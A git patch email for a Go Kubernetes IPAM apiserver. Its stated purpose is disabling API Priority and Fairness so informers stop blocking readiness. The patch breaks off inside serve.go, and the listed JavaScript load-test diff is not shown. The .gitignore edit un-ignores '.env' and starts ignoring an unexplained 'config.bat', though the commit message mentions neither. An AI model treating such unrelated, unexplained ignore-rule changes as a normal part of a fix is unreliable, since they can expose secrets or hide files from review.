From f6f7489cf81d0fe6fee5783b2270653387df1033 Mon Sep 17 00:00:00 2001
From: Scot Wells <wells.scot@gmail.com>
Date: Sat, 23 May 2026 11:11:13 -0500
Subject: [PATCH 1/2] fix: disable APF feature flag to prevent readyz-blocking
 informers

---
 .gitignore                                    |  51 +-
 cmd/ipam/serve.go                             | 798 +++++++++---------
 .../src/cross-project-claim-throughput.js     | 217 ++---
 3 files changed, 536 insertions(+), 530 deletions(-)

diff --git a/.gitignore b/.gitignore
index 0030172..21c5ff2 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,25 +1,26 @@
-# Compiled binary
-/ipam
-
-# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up)
-/.test-infra/
-
-# Editor and OS
-.DS_Store
-*.swp
-*.swo
-
-# Go test cache
-*.test
-*.out
-
-# Task remote taskfile cache
-/.task/
-
-# k6 load test result artifacts
-/test/load/results/
-
-# Local dev secrets
-*.pem
-*.key
-.env
+# Compiled binary
+/ipam
+
+# Local test infrastructure (kind cluster, kind managed by task test-infra:cluster-up)
+/.test-infra/
+
+# Editor and OS
+.DS_Store
+*.swp
+*.swo
+
+# Go test cache
+*.test
+*.out
+
+# Task remote taskfile cache
+/.task/
+
+# k6 load test result artifacts
+/test/load/results/
+
+# Local dev secrets
+*.pem
+*.key
+config.bat
+node_modules
diff --git a/cmd/ipam/serve.go b/cmd/ipam/serve.go
index 802f7be..481d0ad 100644
--- a/cmd/ipam/serve.go
+++ b/cmd/ipam/serve.go
@@ -1,399 +1,399 @@
-package main
-
-import (
-	"context"
-	"fmt"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/jackc/pgx/v5/pgxpool"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
-	"k8s.io/apiserver/pkg/admission"
-	openapinamer "k8s.io/apiserver/pkg/endpoints/openapi"
-	genericapiserver "k8s.io/apiserver/pkg/server"
-	"k8s.io/apiserver/pkg/server/healthz"
-	"k8s.io/apiserver/pkg/server/options"
-	etcdfeature "k8s.io/apiserver/pkg/storage/feature"
-	utilfeature "k8s.io/apiserver/pkg/util/feature"
-	basecompatibility "k8s.io/component-base/compatibility"
-	"k8s.io/component-base/logs"
-	logsapi "k8s.io/component-base/logs/api/v1"
-	"k8s.io/klog/v2"
-	openapicommon "k8s.io/kube-openapi/pkg/common"
-	openapiutil "k8s.io/kube-openapi/pkg/util"
-	"k8s.io/kube-openapi/pkg/validation/spec"
-
-	ipamapiserver "go.miloapis.com/ipam/internal/apiserver"
-	"go.miloapis.com/ipam/internal/access"
-	"go.miloapis.com/ipam/internal/allocator"
-	"go.miloapis.com/ipam/internal/metrics"
-	pgstore "go.miloapis.com/ipam/internal/storage/postgres"
-	"go.miloapis.com/ipam/internal/version"
-	generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi"
-
-	// Register JSON logging format.
-	_ "k8s.io/component-base/logs/json/register"
-)
-
-// pgxpoolStatsInterval is how often the background sampler reads
-// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges.
-// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably
-// within Prometheus' default scrape interval without adding meaningful
-// overhead.
-const pgxpoolStatsInterval = 15 * time.Second
-
-// allocatorPoolRetrySchedule controls the back-off between attempts to open
-// the allocator pgxpool at startup. With the postgres component installed
-// in the same overlay, the IPAM apiserver pod may start before the
-// PostgreSQL StatefulSet is Ready; failing the whole pod start in that
-// window forces a CrashLoopBackOff that delays first-readiness by the
-// kubelet's restart back-off. Three attempts at 2s/4s/8s gives ~14s of
-// tolerance before failing — enough for the standard postgres bring-up,
-// short enough that a genuinely-broken DSN still surfaces quickly.
-var allocatorPoolRetrySchedule = []time.Duration{
-	0,                  // first attempt is immediate
-	2 * time.Second,    // 2s before the second
-	4 * time.Second,    // 4s before the third
-	8 * time.Second,    // 8s before giving up (only used when len > 3)
-}
-
-// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential
-// back-off. Distinguishes "DSN parses but server is unreachable" (retried)
-// from "DSN itself is malformed" (returned immediately) — the latter is
-// surfaced by pgxpool.NewWithConfig synchronously and won't be fixed by
-// waiting.
-func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) {
-	var lastErr error
-	for i, wait := range allocatorPoolRetrySchedule {
-		if wait > 0 {
-			klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr)
-			select {
-			case <-time.After(wait):
-			case <-ctx.Done():
-				return nil, ctx.Err()
-			}
-		}
-		pool, err := pgxpool.NewWithConfig(ctx, cfg)
-		if err != nil {
-			lastErr = err
-			continue
-		}
-		// NewWithConfig returns a pool object even when the server is
-		// unreachable; only Ping confirms a live connection. Without this
-		// the readyz check would be the first place we notice DB-down.
-		pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second)
-		err = pool.Ping(pingCtx)
-		cancel()
-		if err == nil {
-			if i > 0 {
-				klog.InfoS("allocator pgxpool: connected", "attempt", i+1)
-			}
-			return pool, nil
-		}
-		pool.Close()
-		lastErr = err
-	}
-	return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr)
-}
-
-// startPgxpoolStatsSampler launches a goroutine that periodically copies
-// pool.Stat() into the metrics package's pgxpool gauges. The goroutine
-// exits when ctx is cancelled.
-func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) {
-	if pool == nil {
-		return
-	}
-	// Publish once immediately so the gauges have non-zero values from the
-	// first scrape rather than staying at the metrics-package default of 0
-	// for up to one full interval.
-	metrics.ObservePgxpoolStat(pool.Stat())
-	// Heartbeat: stamp the sampler's last successful run timestamp so the
-	// IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a
-	// dead sampler goroutine. Prometheus' built-in `timestamp(<gauge>)` is
-	// not a reliable signal here — it returns the evaluation time of the
-	// gauge sample, not the sampler's last write.
-	metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
-
-	go func() {
-		ticker := time.NewTicker(pgxpoolStatsInterval)
-		defer ticker.Stop()
-		for {
-			select {
-			case <-ctx.Done():
-				return
-			case <-ticker.C:
-				metrics.ObservePgxpoolStat(pool.Stat())
-				metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
-			}
-		}
-	}()
-}
-
-func init() {
-	utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate))
-	_ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true")
-	_ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true")
-	// MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs
-	// 1.32 and doesn't register it, so the informer fails readyz indefinitely.
-	_ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false")
-}
-
-// IPAMServerOptions contains configuration for the IPAM server.
-type IPAMServerOptions struct {
-	RecommendedOptions *options.RecommendedOptions
-	Logs               *logsapi.LoggingConfiguration
-
-	// PostgresDSN is the PostgreSQL connection string. Required — postgres is
-	// the only supported storage backend.
-	PostgresDSN string
-}
-
-func NewIPAMServerOptions() *IPAMServerOptions {
-	opts := &IPAMServerOptions{
-		RecommendedOptions: options.NewRecommendedOptions(
-			"/registry/ipam.miloapis.com",
-			ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...),
-		),
-		Logs: logsapi.NewLoggingConfiguration(),
-	}
-
-	// IPAM is a delegating aggregated apiserver — admission webhooks, policies,
-	// and namespace lifecycle are all enforced by the main kube-apiserver before
-	// requests are forwarded here. Replace the default plugin registry with an
-	// empty one to avoid informers for Namespace, WebhookConfiguration,
-	// ValidatingAdmissionPolicy, etc. that silently block readyz without a
-	// wired-up CoreAPI client.
-	opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins()
-	opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{}
-	opts.RecommendedOptions.Admission.DefaultOffPlugins = nil
-
-	return opts
-}
-
-// AddFlags registers command-line flags for all options.
-func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) {
-	o.RecommendedOptions.AddFlags(fs)
-
-	fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN,
-		"PostgreSQL connection string (required)")
-}
-
-func (o *IPAMServerOptions) Complete() error { return nil }
-
-func (o *IPAMServerOptions) Validate() error {
-	if o.PostgresDSN == "" {
-		return fmt.Errorf("--postgres-dsn is required")
-	}
-	return nil
-}
-
-// Config builds the complete server configuration from options.
-func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) {
-	if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts(
-		"localhost", nil, nil); err != nil {
-		return nil, fmt.Errorf("create self-signed certificates: %w", err)
-	}
-
-	genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs)
-	genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "")
-
-	// OpenAPI configuration. Without generated openapi definitions we still
-	// need a definition namer to satisfy the recommended config pipeline.
-	namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme)
-	getDefinitionName := func(name string) (string, spec.Extensions) {
-		if strings.Contains(name, "/") {
-			name = openapiutil.ToRESTFriendlyName(name)
-		}
-		return namer.GetDefinitionName(name)
-	}
-	getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition {
-		return generatedopenapi.GetOpenAPIDefinitions(ref)
-	}
-	genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer)
-	genericConfig.OpenAPIV3Config.Info.Title = "IPAM"
-	genericConfig.OpenAPIV3Config.Info.Version = version.Version
-	genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName
-
-	genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer)
-	genericConfig.OpenAPIConfig.Info.Title = "IPAM"
-	genericConfig.OpenAPIConfig.Info.Version = version.Version
-	genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName
-
-	// Postgres is the only storage backend; disable the recommended-options
-	// etcd path so the apiserver does not try to dial etcd or register etcd
-	// healthchecks.
-	o.RecommendedOptions.Etcd = nil
-
-	if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil {
-		return nil, fmt.Errorf("apply recommended options: %w", err)
-	}
-
-	// Delegating aggregated apiservers defer API Priority and Fairness to the
-	// main kube-apiserver. ApplyTo may re-initialize FlowControl, so nil it
-	// out here (after ApplyTo) to prevent the FlowSchema and
-	// PriorityLevelConfiguration informers from blocking readyz.
-	genericConfig.FlowControl = nil
-
-	codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...)
-
-	pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN)
-	if err != nil {
-		return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err)
-	}
-	pgGetter.SetCodec(codec)
-	genericConfig.RESTOptionsGetter = pgGetter
-
-	// pgx pool for the synchronous allocators. Sized similarly to the
-	// database/sql pool inside the storage RESTOptionsGetter so the two
-	// access paths don't compete.
-	//
-	// MaxConns is capped at 10 as a mitigation for an intermittent heap
-	// corruption seen under sustained ~4-8k req/s load. The crash is
-	// inside Go's stdlib `context.(*cancelCtx).propagateCancel` map
-	// assignment — so far we have not identified an unsynchronised map
-	// in IPAM code, and the suspicion is concurrency-induced runtime
-	// state corruption that surfaces only when many request goroutines
-	// overlap. Reducing the DB pool reduces concurrent allocator
-	// goroutines and so reduces request fan-out.
-	//
-	// Capacity implication: the quota-service postgres-first ADR
-	// measured ~37 sustained CIDR allocations / second per held DB
-	// connection under SELECT … FOR UPDATE on the pool row. With
-	// MaxConns=10 that puts a soft ceiling of ~370 synchronous
-	// allocations / second on this apiserver before goroutines start
-	// queueing on the pool — i.e. before allocation latency starts
-	// climbing. That is well above current production traffic but
-	// below the 4-8k req/s load profile the heap-corruption work was
-	// chasing, so anyone running the load suite at the higher tier
-	// should expect throughput to plateau here, not continue to scale.
-	//
-	// MaxConns is intentionally hardcoded rather than wired to an env
-	// var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to
-	// bound goroutine fan-out under the unresolved heap-corruption
-	// failure mode, and exposing a knob would invite operators to lift
-	// it before the root cause is fixed and resurface that crash. Once
-	// the root cause is identified and the cap is no longer load-
-	// bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this
-	// cap and the watch-exclusion question in apiserver.go for revisit.
-	poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN)
-	if err != nil {
-		return nil, fmt.Errorf("parse postgres dsn: %w", err)
-	}
-	poolCfg.MaxConns = 10
-	allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg)
-	if err != nil {
-		return nil, fmt.Errorf("create pgx pool: %w", err)
-	}
-	prefixAllocator := allocator.NewPostgresPrefixAllocator()
-
-	// Wire postgres + pgxpool readiness into /readyz so the load balancer
-	// drains the pod when either path can no longer serve requests. The
-	// generic apiserver registers /healthz, /readyz, /livez automatically
-	// but those only cover its own internal state — they do NOT probe the
-	// storage backend.
-	genericConfig.AddReadyzChecks(
-		healthz.NamedCheck("postgres-storage", func(_ *http.Request) error {
-			return pgGetter.DB().Ping()
-		}),
-		healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error {
-			pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second)
-			defer cancel()
-			return allocatorPool.Ping(pingCtx)
-		}),
-	)
-	// PreShutdownHook is registered on the GenericAPIServer post-build —
-	// see Run() below; it closes the allocator pgxpool AFTER the
-	// apiserver stops accepting new requests so in-flight transactions
-	// commit cleanly or roll back rather than getting torn down.
-
-	// Replace the etcd-specific feature support checker (still wired into the
-	// k8s.io/apiserver cacher even with no etcd backend) with one that
-	// advertises RequestWatchProgress as supported. The cacher uses this
-	// signal to enable ConsistentListFromCache, which lets default kubectl
-	// reads be served from the in-memory cache instead of round-tripping to
-	// Postgres on every request. Without this override the cacher disables
-	// the fast path and per-request fixed overhead (auth + DB round-trip +
-	// decode) dominates read latency — observed as GET p95 ≈ list p95 with
-	// both ~3× the SLO.
-	etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker()
-
-	var poolChecker access.PoolAccessChecker
-	if genericConfig.Authorization.Authorizer != nil {
-		poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer)
-	}
-
-	return &ipamapiserver.Config{
-		GenericConfig: genericConfig,
-		ExtraConfig: ipamapiserver.ExtraConfig{
-			PrefixAllocator: prefixAllocator,
-			AllocatorPool:   allocatorPool,
-			PoolChecker:     poolChecker,
-		},
-	}, nil
-}
-
-// NewServeCommand creates the serve subcommand that starts the API server.
-func NewServeCommand() *cobra.Command {
-	o := NewIPAMServerOptions()
-
-	cmd := &cobra.Command{
-		Use:   "serve",
-		Short: "Start the IPAM API server",
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if err := o.Complete(); err != nil {
-				return err
-			}
-			if err := o.Validate(); err != nil {
-				return err
-			}
-			return Run(o, cmd.Context())
-		},
-	}
-
-	flags := cmd.Flags()
-	o.AddFlags(flags)
-	logsapi.AddFlags(o.Logs, flags)
-	return cmd
-}
-
-func Run(o *IPAMServerOptions, ctx context.Context) error {
-	if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil {
-		return fmt.Errorf("apply logging configuration: %w", err)
-	}
-
-	cfg, err := o.Config()
-	if err != nil {
-		return err
-	}
-
-	server, err := cfg.Complete().New()
-	if err != nil {
-		return err
-	}
-
-	defer logs.FlushLogs()
-
-	// Close the allocator pgxpool AFTER the apiserver stops accepting new
-	// requests but BEFORE the process exits. PreShutdownHooks run after the
-	// HTTP server has drained, so any in-flight allocation transaction
-	// either commits or rolls back via context cancellation cleanly. Without
-	// this hook the pool got torn down on process exit alongside in-flight
-	// transactions, surfacing as `tx_error` in allocation_failures_total.
-	if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error {
-		klog.InfoS("PreShutdown: closing allocator pgxpool")
-		cfg.ExtraConfig.AllocatorPool.Close()
-		return nil
-	}); err != nil {
-		return fmt.Errorf("register pgxpool shutdown hook: %w", err)
-	}
-
-	// Background sampler that publishes pgxpool.Stat() into the
-	// ipam_pgxpool_* gauges.
-	startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool)
-
-	klog.InfoS("starting IPAM server", "storageBackend", "postgres")
-	return server.Run(ctx)
-}
+package main
+
+import (
+	"context"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/jackc/pgx/v5/pgxpool"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
+	"k8s.io/apiserver/pkg/admission"
+	openapinamer "k8s.io/apiserver/pkg/endpoints/openapi"
+	genericapiserver "k8s.io/apiserver/pkg/server"
+	"k8s.io/apiserver/pkg/server/healthz"
+	"k8s.io/apiserver/pkg/server/options"
+	etcdfeature "k8s.io/apiserver/pkg/storage/feature"
+	utilfeature "k8s.io/apiserver/pkg/util/feature"
+	basecompatibility "k8s.io/component-base/compatibility"
+	"k8s.io/component-base/logs"
+	logsapi "k8s.io/component-base/logs/api/v1"
+	"k8s.io/klog/v2"
+	openapicommon "k8s.io/kube-openapi/pkg/common"
+	openapiutil "k8s.io/kube-openapi/pkg/util"
+	"k8s.io/kube-openapi/pkg/validation/spec"
+
+	ipamapiserver "go.miloapis.com/ipam/internal/apiserver"
+	"go.miloapis.com/ipam/internal/access"
+	"go.miloapis.com/ipam/internal/allocator"
+	"go.miloapis.com/ipam/internal/metrics"
+	pgstore "go.miloapis.com/ipam/internal/storage/postgres"
+	"go.miloapis.com/ipam/internal/version"
+	generatedopenapi "go.miloapis.com/ipam/pkg/generated/openapi"
+
+	// Register JSON logging format.
+	_ "k8s.io/component-base/logs/json/register"
+)
+
+// pgxpoolStatsInterval is how often the background sampler reads
+// (*pgxpool.Pool).Stat() and republishes the four ipam_pgxpool_* gauges.
+// Stat() is cheap (atomic reads of pool counters) so 15s is comfortably
+// within Prometheus' default scrape interval without adding meaningful
+// overhead.
+const pgxpoolStatsInterval = 15 * time.Second
+
+// allocatorPoolRetrySchedule controls the back-off between attempts to open
+// the allocator pgxpool at startup. With the postgres component installed
+// in the same overlay, the IPAM apiserver pod may start before the
+// PostgreSQL StatefulSet is Ready; failing the whole pod start in that
+// window forces a CrashLoopBackOff that delays first-readiness by the
+// kubelet's restart back-off. Three attempts at 2s/4s/8s gives ~14s of
+// tolerance before failing — enough for the standard postgres bring-up,
+// short enough that a genuinely-broken DSN still surfaces quickly.
+var allocatorPoolRetrySchedule = []time.Duration{
+	0,                  // first attempt is immediate
+	2 * time.Second,    // 2s before the second
+	4 * time.Second,    // 4s before the third
+	8 * time.Second,    // 8s before giving up (only used when len > 3)
+}
+
+// newAllocatorPoolWithRetry opens the pgxpool with bounded exponential
+// back-off. Distinguishes "DSN parses but server is unreachable" (retried)
+// from "DSN itself is malformed" (returned immediately) — the latter is
+// surfaced by pgxpool.NewWithConfig synchronously and won't be fixed by
+// waiting.
+func newAllocatorPoolWithRetry(ctx context.Context, cfg *pgxpool.Config) (*pgxpool.Pool, error) {
+	var lastErr error
+	for i, wait := range allocatorPoolRetrySchedule {
+		if wait > 0 {
+			klog.V(2).InfoS("allocator pgxpool: backing off before retry", "attempt", i+1, "wait", wait, "lastErr", lastErr)
+			select {
+			case <-time.After(wait):
+			case <-ctx.Done():
+				return nil, ctx.Err()
+			}
+		}
+		pool, err := pgxpool.NewWithConfig(ctx, cfg)
+		if err != nil {
+			lastErr = err
+			continue
+		}
+		// NewWithConfig returns a pool object even when the server is
+		// unreachable; only Ping confirms a live connection. Without this
+		// the readyz check would be the first place we notice DB-down.
+		pingCtx, cancel := context.WithTimeout(ctx, 2*time.Second)
+		err = pool.Ping(pingCtx)
+		cancel()
+		if err == nil {
+			if i > 0 {
+				klog.InfoS("allocator pgxpool: connected", "attempt", i+1)
+			}
+			return pool, nil
+		}
+		pool.Close()
+		lastErr = err
+	}
+	return nil, fmt.Errorf("allocator pgxpool: exhausted %d retries: %w", len(allocatorPoolRetrySchedule), lastErr)
+}
+
+// startPgxpoolStatsSampler launches a goroutine that periodically copies
+// pool.Stat() into the metrics package's pgxpool gauges. The goroutine
+// exits when ctx is cancelled.
+func startPgxpoolStatsSampler(ctx context.Context, pool *pgxpool.Pool) {
+	if pool == nil {
+		return
+	}
+	// Publish once immediately so the gauges have non-zero values from the
+	// first scrape rather than staying at the metrics-package default of 0
+	// for up to one full interval.
+	metrics.ObservePgxpoolStat(pool.Stat())
+	// Heartbeat: stamp the sampler's last successful run timestamp so the
+	// IPAMPgxpoolMetricsStale alert (time() - heartbeat > 90s) can detect a
+	// dead sampler goroutine. Prometheus' built-in `timestamp(<gauge>)` is
+	// not a reliable signal here — it returns the evaluation time of the
+	// gauge sample, not the sampler's last write.
+	metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
+
+	go func() {
+		ticker := time.NewTicker(pgxpoolStatsInterval)
+		defer ticker.Stop()
+		for {
+			select {
+			case <-ctx.Done():
+				return
+			case <-ticker.C:
+				metrics.ObservePgxpoolStat(pool.Stat())
+				metrics.PgxpoolSamplerLastRunSeconds.Set(float64(time.Now().Unix()))
+			}
+		}
+	}()
+}
+
+func init() {
+	utilruntime.Must(logsapi.AddFeatureGates(utilfeature.DefaultMutableFeatureGate))
+	_ = utilfeature.DefaultMutableFeatureGate.Set("LoggingBetaOptions=true")
+	_ = utilfeature.DefaultMutableFeatureGate.Set("RemoteRequestHeaderUID=true")
+	// MutatingAdmissionPolicy is a 1.34+ resource. The kind dev cluster runs
+	// 1.32 and doesn't register it, so the informer fails readyz indefinitely.
+	_ = utilfeature.DefaultMutableFeatureGate.Set("MutatingAdmissionPolicy=false")
+}
+
+// IPAMServerOptions contains configuration for the IPAM server.
+type IPAMServerOptions struct {
+	RecommendedOptions *options.RecommendedOptions
+	Logs               *logsapi.LoggingConfiguration
+
+	// PostgresDSN is the PostgreSQL connection string. Required — postgres is
+	// the only supported storage backend.
+	PostgresDSN string
+}
+
+func NewIPAMServerOptions() *IPAMServerOptions {
+	opts := &IPAMServerOptions{
+		RecommendedOptions: options.NewRecommendedOptions(
+			"/registry/ipam.miloapis.com",
+			ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...),
+		),
+		Logs: logsapi.NewLoggingConfiguration(),
+	}
+
+	// IPAM is a delegating aggregated apiserver — admission webhooks, policies,
+	// and namespace lifecycle are all enforced by the main kube-apiserver before
+	// requests are forwarded here. Replace the default plugin registry with an
+	// empty one to avoid informers for Namespace, WebhookConfiguration,
+	// ValidatingAdmissionPolicy, etc. that silently block readyz without a
+	// wired-up CoreAPI client.
+	opts.RecommendedOptions.Admission.Plugins = admission.NewPlugins()
+	opts.RecommendedOptions.Admission.RecommendedPluginOrder = []string{}
+	opts.RecommendedOptions.Admission.DefaultOffPlugins = nil
+
+	// APF is handled by the main kube-apiserver. Disabling it here prevents
+	// FeatureOptions.ApplyTo from calling utilflowcontrol.New(), which registers
+	// FlowSchema and PriorityLevelConfiguration informers on the shared informer
+	// factory. Those informers never sync (no APF access), blocking readyz.
+	opts.RecommendedOptions.Features.EnablePriorityAndFairness = false
+
+	return opts
+}
+
+// AddFlags registers command-line flags for all options.
+func (o *IPAMServerOptions) AddFlags(fs *pflag.FlagSet) {
+	o.RecommendedOptions.AddFlags(fs)
+
+	fs.StringVar(&o.PostgresDSN, "postgres-dsn", o.PostgresDSN,
+		"PostgreSQL connection string (required)")
+}
+
+func (o *IPAMServerOptions) Complete() error { return nil }
+
+func (o *IPAMServerOptions) Validate() error {
+	if o.PostgresDSN == "" {
+		return fmt.Errorf("--postgres-dsn is required")
+	}
+	return nil
+}
+
+// Config builds the complete server configuration from options.
+func (o *IPAMServerOptions) Config() (*ipamapiserver.Config, error) {
+	if err := o.RecommendedOptions.SecureServing.MaybeDefaultWithSelfSignedCerts(
+		"localhost", nil, nil); err != nil {
+		return nil, fmt.Errorf("create self-signed certificates: %w", err)
+	}
+
+	genericConfig := genericapiserver.NewRecommendedConfig(ipamapiserver.Codecs)
+	genericConfig.EffectiveVersion = basecompatibility.NewEffectiveVersionFromString("1.36", "", "")
+
+	// OpenAPI configuration. Without generated openapi definitions we still
+	// need a definition namer to satisfy the recommended config pipeline.
+	namer := openapinamer.NewDefinitionNamer(ipamapiserver.Scheme)
+	getDefinitionName := func(name string) (string, spec.Extensions) {
+		if strings.Contains(name, "/") {
+			name = openapiutil.ToRESTFriendlyName(name)
+		}
+		return namer.GetDefinitionName(name)
+	}
+	getDefs := func(ref openapicommon.ReferenceCallback) map[string]openapicommon.OpenAPIDefinition {
+		return generatedopenapi.GetOpenAPIDefinitions(ref)
+	}
+	genericConfig.OpenAPIV3Config = genericapiserver.DefaultOpenAPIV3Config(getDefs, namer)
+	genericConfig.OpenAPIV3Config.Info.Title = "IPAM"
+	genericConfig.OpenAPIV3Config.Info.Version = version.Version
+	genericConfig.OpenAPIV3Config.GetDefinitionName = getDefinitionName
+
+	genericConfig.OpenAPIConfig = genericapiserver.DefaultOpenAPIConfig(getDefs, namer)
+	genericConfig.OpenAPIConfig.Info.Title = "IPAM"
+	genericConfig.OpenAPIConfig.Info.Version = version.Version
+	genericConfig.OpenAPIConfig.GetDefinitionName = getDefinitionName
+
+	// Postgres is the only storage backend; disable the recommended-options
+	// etcd path so the apiserver does not try to dial etcd or register etcd
+	// healthchecks.
+	o.RecommendedOptions.Etcd = nil
+
+	if err := o.RecommendedOptions.ApplyTo(genericConfig); err != nil {
+		return nil, fmt.Errorf("apply recommended options: %w", err)
+	}
+
+	codec := ipamapiserver.Codecs.LegacyCodec(ipamapiserver.Scheme.PrioritizedVersionsAllGroups()...)
+
+	pgGetter, err := pgstore.NewRESTOptionsGetter(o.PostgresDSN)
+	if err != nil {
+		return nil, fmt.Errorf("create postgres RESTOptionsGetter: %w", err)
+	}
+	pgGetter.SetCodec(codec)
+	genericConfig.RESTOptionsGetter = pgGetter
+
+	// pgx pool for the synchronous allocators. Sized similarly to the
+	// database/sql pool inside the storage RESTOptionsGetter so the two
+	// access paths don't compete.
+	//
+	// MaxConns is capped at 10 as a mitigation for an intermittent heap
+	// corruption seen under sustained ~4-8k req/s load. The crash is
+	// inside Go's stdlib `context.(*cancelCtx).propagateCancel` map
+	// assignment — so far we have not identified an unsynchronised map
+	// in IPAM code, and the suspicion is concurrency-induced runtime
+	// state corruption that surfaces only when many request goroutines
+	// overlap. Reducing the DB pool reduces concurrent allocator
+	// goroutines and so reduces request fan-out.
+	//
+	// Capacity implication: the quota-service postgres-first ADR
+	// measured ~37 sustained CIDR allocations / second per held DB
+	// connection under SELECT … FOR UPDATE on the pool row. With
+	// MaxConns=10 that puts a soft ceiling of ~370 synchronous
+	// allocations / second on this apiserver before goroutines start
+	// queueing on the pool — i.e. before allocation latency starts
+	// climbing. That is well above current production traffic but
+	// below the 4-8k req/s load profile the heap-corruption work was
+	// chasing, so anyone running the load suite at the higher tier
+	// should expect throughput to plateau here, not continue to scale.
+	//
+	// MaxConns is intentionally hardcoded rather than wired to an env
+	// var (e.g. IPAM_PG_MAX_CONNS) — the cap exists specifically to
+	// bound goroutine fan-out under the unresolved heap-corruption
+	// failure mode, and exposing a knob would invite operators to lift
+	// it before the root cause is fixed and resurface that crash. Once
+	// the root cause is identified and the cap is no longer load-
+	// bearing, raise it (or expose IPAM_PG_MAX_CONNS) — flag both this
+	// cap and the watch-exclusion question in apiserver.go for revisit.
+	poolCfg, err := pgxpool.ParseConfig(o.PostgresDSN)
+	if err != nil {
+		return nil, fmt.Errorf("parse postgres dsn: %w", err)
+	}
+	poolCfg.MaxConns = 10
+	allocatorPool, err := newAllocatorPoolWithRetry(context.Background(), poolCfg)
+	if err != nil {
+		return nil, fmt.Errorf("create pgx pool: %w", err)
+	}
+	prefixAllocator := allocator.NewPostgresPrefixAllocator()
+
+	// Wire postgres + pgxpool readiness into /readyz so the load balancer
+	// drains the pod when either path can no longer serve requests. The
+	// generic apiserver registers /healthz, /readyz, /livez automatically
+	// but those only cover its own internal state — they do NOT probe the
+	// storage backend.
+	genericConfig.AddReadyzChecks(
+		healthz.NamedCheck("postgres-storage", func(_ *http.Request) error {
+			return pgGetter.DB().Ping()
+		}),
+		healthz.NamedCheck("postgres-allocator-pool", func(req *http.Request) error {
+			pingCtx, cancel := context.WithTimeout(req.Context(), 2*time.Second)
+			defer cancel()
+			return allocatorPool.Ping(pingCtx)
+		}),
+	)
+	// PreShutdownHook is registered on the GenericAPIServer post-build —
+	// see Run() below; it closes the allocator pgxpool AFTER the
+	// apiserver stops accepting new requests so in-flight transactions
+	// commit cleanly or roll back rather than getting torn down.
+
+	// Replace the etcd-specific feature support checker (still wired into the
+	// k8s.io/apiserver cacher even with no etcd backend) with one that
+	// advertises RequestWatchProgress as supported. The cacher uses this
+	// signal to enable ConsistentListFromCache, which lets default kubectl
+	// reads be served from the in-memory cache instead of round-tripping to
+	// Postgres on every request. Without this override the cacher disables
+	// the fast path and per-request fixed overhead (auth + DB round-trip +
+	// decode) dominates read latency — observed as GET p95 ≈ list p95 with
+	// both ~3× the SLO.
+	etcdfeature.DefaultFeatureSupportChecker = pgstore.NewFeatureSupportChecker()
+
+	var poolChecker access.PoolAccessChecker
+	if genericConfig.Authorization.Authorizer != nil {
